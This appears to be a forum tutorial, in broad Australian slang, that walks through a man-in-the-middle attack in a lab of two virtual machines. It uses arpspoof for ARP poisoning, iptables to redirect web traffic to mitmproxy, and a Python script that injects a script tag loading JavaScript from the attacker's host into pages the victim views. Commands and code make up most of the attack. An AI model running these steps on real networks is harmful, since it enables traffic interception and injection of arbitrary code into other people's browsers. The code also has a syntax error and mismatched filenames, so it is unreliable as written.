In this tuto, we're gonna tackle a ripper topic that always gets the punters frothin'. It ain't nothin' new, but it still packs a fair punch, y'know? We're talkin' about hackin' into the TCP/IP network by pullin' a classic man-in-the-middle attack with some good ol' ARP poisoning. We're gonna zero in on web traffic and how to control it with a web proxy built just for this sorta attack - mitmproxy.
This little ripper tool, which you can snag from its GitHub at https://github.com/mitmproxy/mitmproxy, acts like a web proxy where you can intercept traffic, just like other local web proxies like Burp or ZAP. But get this, it also lets you run Python scripts to do stuff like inject HTML code. There are plenty of other tools that let you do this too, but we reckon mitmproxy's the best 'cause it's a piece of cake to set up for this attack.
The Goal: Injectin' HTML
Our goal, is to launch a man-in-the-middle attack usin' ARP poisoning, redirect the web traffic to our local mitmproxy, and inject new code into the server's response. That way, we can mess with how the website looks on the victim's browser.
The Setup
We've got two virtual machines - a Windows 7 box (192.168.10.146) playin' the victim, and a Kali 2 machine (192.168.10.149) as the attacker.
On the attack machine, we'll be usin' these tools:
- arpspoof: For the man-in-the-middle ARP poisoning attack
- iptables: To redirect port 80/443 traffic to mitmproxy
- mitmproxy: To intercept and inject that HTML code
The Attack and Traffic Redirection
Before we can inject any HTML shenanigans into the server's responses to the client (the victim's web browser), we need their network traffic flowin' through our attack machine. To do that, we'll kick off an ARP spoofing attack with the arpspoof tool.
But first, if we don't wanna leave the victim high and dry without internet or network access, we'll need our attack machine to act like a router and forward packets.
Code: Select all
echo 1 > /proc/sys/net/ipv4/ip_forwardKeepin' in mind that the gateway is 192.168.10.2, the command would look like:
Code: Select all
arpspoof -i eth0 -t 192.168.10.146 192.168.10.2If it all went off without a hitch, the Windows 7 machine's network traffic should be passin' through our interface. Our target is web traffic - both HTTP (port 80) and HTTPS (443) - so we'll need to redirect that traffic to mitmproxy, which listens on port 8080 by default.
Code: Select all
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8080cInjectin' HTML with mitmproxy
Now that we've got the web traffic redirected, we'll fire up mitmproxy (it's best to run it before doin' the iptables bit) to intercept the traffic and inject some HTML code. In this case, it'll be a cheeky little JavaScript.
We'll pass mitmproxy a script parameter to inject the JavaScript code into the server's HTTP responses, which'll then get loaded in the victim's web browser.
(I nabbed this code from Pankaj Malhotra's blog). This script's called js_injector.py, and here's the code:
Code: Select all
# Usage: mitmdump -s "js_injector.py src"
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from libmproxy.protocol.http import decoded
# On start of proxy server ask for src as an argument
def start(context, argv):
if len(argv) != 2:
raise ValueError('Usage: -s "js_injector.py src"')
context.src_url = argv[1]
def response(context, flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body and ('text/html' in flow.response.headers["content-type"][0]):
script = html.new_tag(
"script",
src=context.src_url)
html.body.insert(len(html.body.contents, script)
flow.response.content = str(html)
context.log("******* Filter Injected *******")It's a Python script that uses the BeautifulSoup library to handle HTML objects. I just modified the line marked to inject the code at the end of the <body> tag instead of the start. In this case, we'll inject a new HTML tag to load a JavaScript file called harlem-shake.js. Can you guess what that'll do to the website already? Let's keep goin'.
You can grab the Harlem Shake JavaScript code from places like this: https://gist.github.com/commadelimited/4958196
Here's the HTML code we'll be injectin':
Code: Select all
<script src=»http://192.168.10.149/harlem-shake.js»></script>I've got the harlem-shake.js file on the same Kali 2 machine, and to let the victim's browser download it, I'll spin up a simple Python web server where the file's stored.
Code: Select all
python -m SimpleHTTPServer 80Now we can run our mitmproxy with the js_injector.py script for JavaScript injection. The -T parameter runs it in transparent mode.
Code: Select all
mitmproxy -T -s «js_inyector.py http://192.168.10.149/harlem-shake.js»We're passing the script an argument which is the source URL for the JavaScript file it needs to inject - in this case, our Python web server where harlem-shake.js lives.
When the victim opens a website in their browser, the traffic will be intercepted and the JavaScript injected. We can even check the page's source code to see that the HTML tag has actually been injected.